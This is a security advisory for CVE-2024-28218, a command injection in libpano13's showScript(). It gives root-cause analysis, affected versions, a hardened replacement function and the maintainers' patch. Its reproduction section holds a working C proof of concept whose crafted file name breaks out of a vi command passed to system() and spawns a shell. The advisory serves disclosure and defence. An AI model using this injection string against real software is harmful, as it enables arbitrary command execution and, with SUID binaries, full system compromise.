Command injection in Panorama Tools (CVE-2024-28218)


Summary

A command injection in showScript() in libpano13 0.1 through 2.9.21 allows context-dependent attackers to execute arbitrary commands via the function's parameters.

Root cause analysis

showScript is a function implemented by libpano13 whose body depends on the operating system, so there are separate implementations for MacOS, Windows, ANSI and X11. The last three are vulnerable to command injection because they execute commands built from the unsanitized input passed in as a parameter.

Taking the X11 implementation as an example, the name member of the fullPath structure is placed directly into a vi command line, which is then executed with system(). The quoting around %s does not help: a double quote inside the name terminates the quoted argument early, and everything after it is interpreted by the shell.

void showScript(fullPath* scriptFile){
    char cmd[sizeof(fullPath) + 16];

    snprintf( cmd, sizeof(cmd)-1, "vi \"%s\"", scriptFile->name );
    if (system( cmd ) == -1) {
        PrintError("Unable to execute script editor");
    }
}

CWEs

Affected components releases

The showScript function, exposed in libpano13's filter.h, is affected.

The vulnerable code snippets were introduced in the first revision for ANSI and Windows, and in the 14th revision for X11. All were released in December 2003, so the affected releases started from 0.1.

The vulnerability was patched in 3005eda747af and 61865cbe74ba by replacing the vulnerable function with a stub. These commits are embedded in the 2.9.22 release.

Consequently, all versions >=0.1 and <=2.9.21 are affected.

Attack vector

To exploit the vulnerability, an attacker must target an application linking libpano13 and control the parameter passed to the showScript function (for example, via command line arguments).

Impact

The impact depends on how pano13 is integrated into the end application. If the end application calls showScript with a user-controlled fullPath, the attacker is able to run arbitrary commands as the user the application's process runs as. If the application is owned by root and has the SUID bit set, the vulnerability leads to full system compromise.

CVSS v3.1 vector

Steps to reproduce

Compile the following program with gcc pano.c -lpano13 -o pano. A shell will be spawned for the user under which the program is executed.

#include <pano13/filter.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv) {
  fullPath *outFile = malloc(sizeof(fullPath));
  char cmd[sizeof(fullPath) + 16];

  /* Build the same string showScript() will hand to system(), for display only */
  sprintf(cmd, "vi \"%s\"", "/tmp/\" --cmd \":set shell=sh|:shell");
  printf("[+] The executed command will be: %s\n", cmd);

  /* The name is copied unchanged into the fullPath, then passed to showScript() */
  StringtoFullPath(outFile, (char *)"/tmp/\" --cmd \":set shell=sh|:shell");
  showScript(outFile);

  free(outFile);
  return 0;
}

Patch

Recommended to the maintainers

As showScript takes a fullPath structure as its first parameter, a sanitisation method (such as realpath) can be called in fullPath's constructors, StringtoFullPath and jpathTofullPath. Independently of that, the function itself should not pass the name through a shell at all: executing the editor directly with the file name as a single argv element removes the quoting problem entirely.
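The following is an added example, not libpano13 code or the maintainers' patch, showing what a hardened showScript could look like: the file name is validated against an allow-list of characters (the character set and the safe_fullPath stand-in struct are assumptions for this example), and the editor is started with fork()/execvp() so the name is always one argv element and no shell ever parses it. The advisory's own PoC string is used as the rejected sample.

```c
/* Added example (not libpano13 code): a replacement for showScript()
 * that never hands the file name to a shell. Two independent defences:
 *  1. an allow-list check on the path (assumed policy, tune as needed);
 *  2. direct execution via execvp(), so quotes, '|', ';' or "--cmd"
 *     inside the name stay part of the file name and cannot become
 *     shell syntax or extra editor options.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical stand-in for libpano13's fullPath: only name matters here. */
#define SAFE_PATH_LEN 512
typedef struct { char name[SAFE_PATH_LEN]; } safe_fullPath;

/* Return 1 when the path consists only of letters, digits, '/', '.',
 * '_' and '-' and does not start with '-' (which an editor would parse
 * as an option). Anything else, including quotes and spaces, is rejected. */
int script_path_is_safe(const char *path) {
    size_t i, n;
    if (path == NULL || (n = strlen(path)) == 0 || n >= SAFE_PATH_LEN)
        return 0;
    if (path[0] == '-')
        return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)path[i];
        if (!(isalnum(c) || c == '/' || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Run `editor` on scriptFile->name without a shell. Returns the editor's
 * exit status (0 on success), 127 if the editor could not be executed,
 * or -1 if the path is rejected or fork()/waitpid() fails. */
int show_script_noshell(const char *editor, const safe_fullPath *scriptFile) {
    pid_t pid;
    int status;

    if (!script_path_is_safe(scriptFile->name)) {
        fprintf(stderr, "showScript: refusing unsafe script path\n");
        return -1;
    }
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* "--" ends option parsing in vim and most getopt-style editors;
         * the name is a single argv element, so no quoting is involved. */
        char *argv[] = { (char *)editor, (char *)"--",
                         (char *)scriptFile->name, NULL };
        execvp(editor, argv);
        _exit(127);            /* only reached if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Convenience wrapper: build the struct from a C string and run. */
int show_script_from_string(const char *editor, const char *name) {
    safe_fullPath p;
    if (name == NULL || strlen(name) >= SAFE_PATH_LEN)
        return -1;
    strcpy(p.name, name);
    return show_script_noshell(editor, &p);
}

int main(void) {
    /* Constructed sample paths; the second is the advisory's PoC string. */
    const char *good = "/tmp/panorama_script.txt";
    const char *bad  = "/tmp/\" --cmd \":set shell=sh|:shell";
    printf("good path accepted: %d\n", script_path_is_safe(good));
    printf("bad path accepted:  %d\n", script_path_is_safe(bad));
    /* `true` stands in for vi so the example runs non-interactively. */
    printf("editor exit status: %d\n", show_script_from_string("true", good));
    return 0;
}
```

The exec-based launch is the fix that matters; the allow-list is defence in depth that also catches names an editor might misinterpret. If the editor must remain configurable (e.g. via $EDITOR), keep it as the argv[0]/execvp target rather than splicing it into a command string.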

Applied by the maintainers

The vulnerability was patched in the commit 3005ed by removing the showScript function.

The patch was made available to the users in the 2.9.22 release.